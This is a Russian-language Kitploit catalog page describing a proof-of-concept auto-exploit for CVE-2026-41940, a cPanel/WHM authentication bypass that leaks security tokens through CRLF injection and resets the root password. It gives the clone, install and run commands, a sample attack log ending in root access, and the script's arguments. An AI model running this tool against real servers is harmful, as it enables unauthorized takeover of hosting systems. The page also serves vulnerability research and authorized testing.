Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-41940 — Доказательство концепции эксплуатации для CVE-2026-41940 — неаутентифицированный обход аутентификации в cPanel/WHM с использованием CRLF-инъекции для утечки токенов безопасности и сброса пароля root. | Kitploit
Инструменты/GitHubGitHub/rosemary1337/cve-2026-41940
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubrosemary1337/cve-2026-41940

CVE-2026-41940

Доказательство концепции эксплуатации для CVE-2026-41940 — неаутентифицированный обход аутентификации в cPanel/WHM с использованием CRLF-инъекции для утечки токенов безопасности и сброса пароля root.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
3 месяцев назадЕщё не проверено

CVE-2026-41940 Автоэксплойт

Python Status Author


Обзор

CVE-2026-41940 — это proof-of-concept (PoC) эксплойт, нацеленный на cPanel/WHM.
Данный эксплойт демонстрирует неаутентифицированный обход аутентификации с использованием CRLF-инъекции для утечки токенов безопасности и получения root-доступа к интерфейсу WHM, что позволяет выполнять такие действия, как смена root-пароля.

Предупреждение: Данный PoC предназначен только для образовательных целей. Не используйте его на системах без разрешения.


Возможности

  • Автоопределение имени хоста: Автоматически определяет каноническое имя хоста для обхода ограничений заголовка Host.
  • Создание сессии до аутентификации: Генерирует действительную начальную сессию для инъекции.
  • CRLF-инъекция: Использует инъекцию в заголовках для утечки cp_security_token.
  • Распространение сессии: Принудительно внедряет утёкший токен в кэш аутентификации сервера.
  • Сброс root-пароля: Автоматически меняет root-пароль WHM при успешном обходе.
  • Минимальные зависимости: Работает со стандартной библиотекой requests.

Установка

  1. Клонируйте репозиторий:
root@kitploit:~
git clone https://github.com/Rosemary1337/CVE-2026-41940.git
cd CVE-2026-41940
  1. Установите зависимости:
root@kitploit:~
pip install requests

Требования: requests, urllib3


Использование

root@kitploit:~
python3 CVE_2026_41940.py --target <TARGET_URL> --password <NEW_PASSWORD>

Пример:

root@kitploit:~
python3 CVE_2026_41940.py --target https://target.com:2087 --password MyNewRootPass123!

Аргументы


Вывод

Консоль показывает:

  • Сообщения о статусе [0-4]
  • Успех [+]
  • Ошибку [!]
  • Информацию [*]

Пример:

root@kitploit:~
[0] hostname = target.local
[1] minting a preauth session...
    session base = :XLNfFj4XjKuS4f9V
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
    HTTP 307, leaked token = /cpsess0555762073
[3] firing do_token_denied to propagate raw -> cache...
    HTTP 401, gadget fired
[4] verifying we're WHM root...
    /json-api/version -> HTTP 200  {"version":"11.110.0.12"}
[*] changing the root password
    passwd -> HTTP 200
[+] now just login to https://target.com:2087 and use the terminal option to get a root shell

Безопасность и предупреждение

  • Только для образовательных и тестовых целей.
  • Не атакуйте веб-сайты без явного разрешения.
  • Используйте только в контролируемой лабораторной среде или при авторизованном тестировании на проникновение.
Скачать инструмент
ФлагОписаниеОбязательныйПо умолчанию
--targetURL цели WHM (например, https://host:2087)Да-
--passwordНовый пароль для root-пользователяДа-
--hostnameПереопределить заголовок Host:НетАвто